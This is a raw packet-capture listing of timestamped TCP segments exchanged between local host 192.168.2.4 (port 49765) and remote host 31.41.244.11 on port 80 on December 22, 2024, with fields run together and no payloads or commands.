                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.337053061 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.337076902 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.337091923 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.337830067 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.337874889 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.337932110 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.337949991 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.338006973 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.338006973 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.338850021 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.338866949 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.338884115 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.338901043 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.338916063 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.338926077 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.339612961 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.339664936 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.339704037 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.339720011 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.339750051 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.339764118 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.340507030 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.340554953 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.340610027 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.340626955 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.340651989 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.340667009 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.341430902 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.341474056 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.341479063 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.341492891 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.341515064 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.341527939 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.342309952 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.342356920 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.342367887 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.342384100 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.342416048 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.342441082 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.343163967 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.343211889 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.343238115 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.343255043 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.343282938 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.343297005 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.349069118 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.349121094 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.349150896 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.349169016 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.349195004 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.349205017 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.349354029 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.349400043 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.349442005 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.349458933 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.349483967 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.349498987 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.350231886 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.350280046 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.350308895 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.350353956 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.507242918 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.507292032 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.507329941 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.507348061 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.507365942 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.507375002 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.507411957 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.507975101 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.508032084 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.508073092 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.508090019 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.508119106 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.508133888 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.508819103 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.508836985 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.508866072 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.508886099 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.509150028 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.509206057 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.509592056 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.509638071 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.509663105 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.509680986 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.509706974 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.509721041 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.510581017 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.510597944 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.510616064 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.510632038 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.510646105 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.510656118 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.511353970 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.511404037 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.511526108 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.511543036 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.511574030 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.511590004 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.512233973 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.512279987 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.512346029 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.512363911 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.512398005 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.512398005 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.513185978 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.513235092 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.513339996 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.513386011 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.513485909 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.513529062 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.514017105 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.514060974 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.514149904 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.514167070 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.514197111 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.514197111 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.514877081 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.514923096 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.515096903 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.515114069 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.515141964 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.515157938 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.516215086 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.516258955 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.516360044 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.516376019 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.516400099 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.516415119 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.516669035 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.516712904 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.516805887 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.516824007 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.516856909 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.516856909 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.517581940 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.517627954 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.517752886 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.517770052 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.517798901 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.517815113 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.518511057 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.518557072 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.518661976 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.518678904 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.518707037 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.518759012 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.519368887 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.519418001 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.519499063 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.519515991 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.519547939 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.519547939 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.520356894 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.520374060 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.520390987 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.520404100 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.520420074 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.520430088 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.521114111 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.521156073 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.521246910 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.521264076 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.521290064 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.521305084 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.521974087 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.522017956 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.522103071 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.522120953 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.522151947 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.522151947 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.522916079 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.522963047 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.523076057 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.523092985 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.523118019 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.523133039 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.523821115 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.523864031 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.523973942 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.523993015 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.524023056 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.524023056 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.524647951 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.524692059 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.524766922 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.524785042 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.524813890 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.524837971 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.525648117 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.525692940 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.525698900 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.525716066 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.525743008 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.525751114 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.526437998 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.526479959 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.526592016 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.526608944 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.526634932 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.526649952 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.527343035 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.527390957 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.527431011 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.527447939 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.527473927 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.527488947 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.528295994 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.528338909 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.528569937 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.528609991 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.528651953 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.528669119 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.528693914 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.528708935 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.529464006 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.529508114 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.529597998 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.529614925 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.529642105 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.529658079 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.530271053 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.530320883 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.530422926 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.530441999 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.530463934 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.530484915 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.531155109 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.531203985 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.531286001 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.531306982 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.531332016 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.531347990 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.532075882 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.532126904 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.532166958 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.532185078 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.532215118 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.532229900 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.532951117 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.532998085 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.533086061 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.533102989 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.533134937 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.533186913 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.533821106 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.533865929 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.533941984 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.533957958 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.533986092 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.534009933 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.534821987 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.534840107 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.534856081 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.534872055 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.534888029 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.534894943 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.535619974 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.535662889 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.535738945 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.535783052 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.541277885 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.541301966 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.541321039 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.541330099 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.541343927 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.541351080 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.541780949 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.541831970 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.541856050 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.541873932 CET804976531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.541898012 CET4976580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:15.541908026 CET4976580192.168.2.431.41.244.11
